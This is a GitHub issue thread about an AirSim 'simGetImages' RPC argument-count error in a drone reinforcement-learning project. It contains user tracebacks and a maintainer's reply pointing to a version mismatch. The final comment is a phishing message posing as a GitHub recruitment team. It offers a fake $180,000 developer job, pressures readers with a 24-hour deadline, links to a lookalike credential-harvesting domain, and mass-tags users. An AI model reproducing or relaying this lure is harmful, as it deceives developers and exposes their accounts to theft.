### ISSUE TITLE
 msgpackrpc.error.RPCError: rpclib: client error C0002: Function 'simGetImages' was called with an invalid number of arguments. Expected: 3, got: 2

### ISSUE THREAD

**Issue by mvtkurd** [batuhan3526/AirSim-PyTorch-Drone-DDQN-Agent#2]
hi @batuhan3526 
I'm trying to use your project but I cope with this error. 

`Using CPU
Traceback (most recent call last):
  File "E:/projects about dqn and drone/AirSim-PyTorch-Drone-DDQN-Agent-main/run.py", line 7, in <module>
    ddqn_agent = DDQN_Agent(useDepth=False)
  File "E:\projects about dqn and drone\AirSim-PyTorch-Drone-DDQN-Agent-main\ddqn_agent.py", line 116, in __init__
    obs, _ = self.env.reset()
  File "E:\projects about dqn and drone\AirSim-PyTorch-Drone-DDQN-Agent-main\env.py", line 69, in reset
    obs, image = self.get_obs()
  File "E:\projects about dqn and drone\AirSim-PyTorch-Drone-DDQN-Agent-main\env.py", line 86, in get_obs
    responses = self.client.simGetImages(
  File "C:\Users\Milad\anaconda3\envs\droneProject\lib\site-packages\airsim\client.py", line 266, in simGetImages
    responses_raw = self.client.call('simGetImages', requests, vehicle_name, external)
  File "C:\Users\Milad\anaconda3\envs\droneProject\lib\site-packages\msgpackrpc\session.py", line 41, in call
    return self.send_request(method, args).get()
  File "C:\Users\Milad\anaconda3\envs\droneProject\lib\site-packages\msgpackrpc\future.py", line 45, in get
    raise error.RPCError(self._error)
msgpackrpc.error.RPCError: rpclib: client error C0002: Function 'simGetImages' was called with an invalid number of arguments. Expected: 3, got: 2`

**Comment by batuhan3526** [comment]
Hello, sorry for my late reply. This is the first time I see this error. After researching the error a bit, it should most likely be related to the airsim version. @mvtkurd

**Comment by zclyaya** [comment]
hello，I meet this problem, but i do not konw how to solve it,can yu help me
D:\Anaconda3\envs\Airsim\python.exe E:\computer\GitHub\Fixedwing-Airsim-master\src\main.py 

In file D:/Anaconda3/envs/Airsim/Lib/site-packages/jsbsim/aircraft/x8/x8.xml: line 80
Engine location ignored, only thruster location is used.

In file D:/Anaconda3/envs/Airsim/Lib/site-packages/jsbsim/aircraft/x8/x8.xml: line 85
Engine orientation ignored, only thruster orientation is used.
Traceback (most recent call last):
  File "E:\computer\GitHub\Fixedwing-Airsim-master\src\main.py", line 218, in <module>
    run_simulator()
  File "E:\computer\GitHub\Fixedwing-Airsim-master\src\main.py", line 196, in run_simulator
    env.simulation_loop(rectangle)
  File "E:\computer\GitHub\Fixedwing-Airsim-master\src\main.py", line 93, in simulation_loop
    image.get_np_image(image_type=airsim.ImageType.Scene)
  File "E:\computer\GitHub\Fixedwing-Airsim-master\src\image_processing.py", line 44, in get_np_image
    False)])
  File "D:\Anaconda3\envs\Airsim\lib\site-packages\airsim\client.py", line 295, in simGetImages
    responses_raw = self.client.call("simGetImages", requests, vehicle_name)
  File "D:\Anaconda3\envs\Airsim\lib\site-packages\msgpackrpc\session.py", line 41, in call
    return self.send_request(method, args).get()
  File "D:\Anaconda3\envs\Airsim\lib\site-packages\msgpackrpc\future.py", line 45, in get
    raise error.RPCError(self._error)
msgpackrpc.error.RPCError: rpclib: client error C0002: Function 'simGetImages' was called with an invalid number of arguments. Expected: 2, got: 3


     JSBSim Flight Dynamics Model v1.1.13 [GitHub build 986/commit a09715f01b9e568ce75ca2635ba0a78ce57f7cdd] Dec  3 2022 12:36:17
            [JSBSim-ML v2.0]

JSBSim startup beginning ...

Connected!
Client Ver:1 (Min Req: 1), Server Ver:1 (Min Req: 1)


Process finished with exit code 1

**Comment by marynavoitenko** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
EntroSolutions, @essn, @sanelez, @SleepyLGod, @timothyshen, @webgurucan, @lopezdp, @alanhamid, @wjnbreu, @JENDIE-SPEED, @gabrieljeremyl, @htadashi, @pqppq, @sudeep162002, @beyondlogical, @nicolasVenard, @smallverse, @lcsouzamenezes, @Bil129, @simonfuture2
